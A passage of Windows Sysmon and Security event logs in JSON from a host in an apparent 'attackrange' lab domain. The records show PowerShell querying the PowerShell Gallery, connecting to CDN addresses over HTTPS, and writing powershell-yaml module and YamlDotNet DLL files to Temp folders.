https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 05:52:21.858","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-881393.attackrange.local","SourcePort":"54941","DestinationIsIpv6":"false","DestinationIp":"72.21.81.200","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 05:52:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:23","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":4665,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.850\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nQueryName: onegetcdn.azureedge.net\r\nQueryStatus: 0\r\nQueryResults: type:  5 onegetcdn.ec.azureedge.net;type:  5 cs9.wpc.v0cdn.net;::ffff:72.21.81.200;\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:52:21.850","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","QueryName":"onegetcdn.azureedge.net","QueryStatus":"0","QueryResults":"type:  5 onegetcdn.ec.azureedge.net;type:  5 cs9.wpc.v0cdn.net;::ffff:72.21.81.200;","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","EventReceivedTime":"2020-08-01 05:52:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:24","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220530,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x65055\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x65055","LogonType":"3","EventReceivedTime":"2020-08-01 05:52:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:24","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":4666,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:23.725\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nQueryName: www.powershellgallery.com\r\nQueryStatus: 0\r\nQueryResults: type:  5 powershellgallerytrafficmanager.trafficmanager.net;type:  5 psg-prod-centralus.cloudapp.net;::ffff:168.61.186.235;\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:52:23.725","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","QueryName":"www.powershellgallery.com","QueryStatus":"0","QueryResults":"type:  5 powershellgallerytrafficmanager.trafficmanager.net;type:  5 psg-prod-centralus.cloudapp.net;::ffff:168.61.186.235;","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","EventReceivedTime":"2020-08-01 05:52:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:25","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":4667,"ProcessID":2740,"ThreadID":3416,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:23.620\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-881393.attackrange.local\r\nSourcePort: 54942\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 184.84.68.43\r\nDestinationHostname: a184-84-68-43.deploy.static.akamaitechnologies.com\r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 05:52:23.620","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-881393.attackrange.local","SourcePort":"54942","DestinationIsIpv6":"false","DestinationIp":"184.84.68.43","DestinationHostname":"a184-84-68-43.deploy.static.akamaitechnologies.com","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 05:52:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:25","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":4668,"ProcessID":2740,"ThreadID":3416,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:23.763\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-881393.attackrange.local\r\nSourcePort: 54943\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 168.61.186.235\r\nDestinationHostname: \r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 05:52:23.763","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-881393.attackrange.local","SourcePort":"54943","DestinationIsIpv6":"false","DestinationIp":"168.61.186.235","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 05:52:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:25","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":4669,"ProcessID":2740,"ThreadID":3416,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:24.050\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-881393.attackrange.local\r\nSourcePort: 54944\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 184.84.68.43\r\nDestinationHostname: a184-84-68-43.deploy.static.akamaitechnologies.com\r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 05:52:24.050","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-881393.attackrange.local","SourcePort":"54944","DestinationIsIpv6":"false","DestinationIp":"184.84.68.43","DestinationHostname":"a184-84-68-43.deploy.static.akamaitechnologies.com","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 05:52:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:25","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":4670,"ProcessID":2740,"ThreadID":3416,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:24.135\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-881393.attackrange.local\r\nSourcePort: 54945\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 168.61.186.235\r\nDestinationHostname: \r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 05:52:24.135","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-881393.attackrange.local","SourcePort":"54945","DestinationIsIpv6":"false","DestinationIp":"168.61.186.235","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 05:52:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:25","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":4671,"ProcessID":2740,"ThreadID":3416,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:24.280\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-881393.attackrange.local\r\nSourcePort: 54946\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 184.84.68.43\r\nDestinationHostname: a184-84-68-43.deploy.static.akamaitechnologies.com\r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 05:52:24.280","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-881393.attackrange.local","SourcePort":"54946","DestinationIsIpv6":"false","DestinationIp":"184.84.68.43","DestinationHostname":"a184-84-68-43.deploy.static.akamaitechnologies.com","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 05:52:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:25","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":4672,"ProcessID":2740,"ThreadID":3416,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:24.366\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-881393.attackrange.local\r\nSourcePort: 54947\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 168.61.186.235\r\nDestinationHostname: \r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 05:52:24.366","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-881393.attackrange.local","SourcePort":"54947","DestinationIsIpv6":"false","DestinationIp":"168.61.186.235","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 05:52:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:26","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4673,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:26.686\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\x2ieug5b\\Load-Assemblies.ps1\r\nCreationUtcTime: 2020-08-01 05:52:26.686","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:26.686","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\x2ieug5b\\Load-Assemblies.ps1","CreationUtcTime":"2020-08-01 05:52:26.686","EventReceivedTime":"2020-08-01 05:52:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:26","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4674,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:26.686\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\x2ieug5b\\Tests\\powershell-yaml.Tests.ps1\r\nCreationUtcTime: 2020-08-01 05:52:26.686","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:26.686","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\x2ieug5b\\Tests\\powershell-yaml.Tests.ps1","CreationUtcTime":"2020-08-01 05:52:26.686","EventReceivedTime":"2020-08-01 05:52:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:26","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4675,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:26.686\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\x2ieug5b\\lib\\net35\\YamlDotNet.dll\r\nCreationUtcTime: 2020-08-01 05:52:26.686","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:26.686","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\x2ieug5b\\lib\\net35\\YamlDotNet.dll","CreationUtcTime":"2020-08-01 05:52:26.686","EventReceivedTime":"2020-08-01 05:52:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:26","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4676,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:26.702\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\x2ieug5b\\lib\\netstandard1.3\\YamlDotNet.dll\r\nCreationUtcTime: 2020-08-01 05:52:26.702","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:26.702","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\x2ieug5b\\lib\\netstandard1.3\\YamlDotNet.dll","CreationUtcTime":"2020-08-01 05:52:26.702","EventReceivedTime":"2020-08-01 05:52:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:26","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4677,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:26.702\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\x2ieug5b\\lib\\net45\\YamlDotNet.dll\r\nCreationUtcTime: 2020-08-01 05:52:26.702","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:26.702","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\x2ieug5b\\lib\\net45\\YamlDotNet.dll","CreationUtcTime":"2020-08-01 05:52:26.702","EventReceivedTime":"2020-08-01 05:52:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:26","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4678,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:26.718\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\1296149399\\powershell-yaml\\Load-Assemblies.ps1\r\nCreationUtcTime: 2020-08-01 05:52:26.718","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:26.718","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\1296149399\\powershell-yaml\\Load-Assemblies.ps1","CreationUtcTime":"2020-08-01 05:52:26.718","EventReceivedTime":"2020-08-01 05:52:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:26","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4679,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:26.718\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\1296149399\\powershell-yaml\\lib\\net35\\YamlDotNet.dll\r\nCreationUtcTime: 2020-08-01 05:52:26.718","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:26.718","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\1296149399\\powershell-yaml\\lib\\net35\\YamlDotNet.dll","CreationUtcTime":"2020-08-01 05:52:26.718","EventReceivedTime":"2020-08-01 05:52:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:26","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4680,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:26.718\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\1296149399\\powershell-yaml\\lib\\net45\\YamlDotNet.dll\r\nCreationUtcTime: 2020-08-01 05:52:26.718","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:26.718","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\1296149399\\powershell-yaml\\lib\\net45\\YamlDotNet.dll","CreationUtcTime":"2020-08-01 05:52:26.718","EventReceivedTime":"2020-08-01 05:52:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
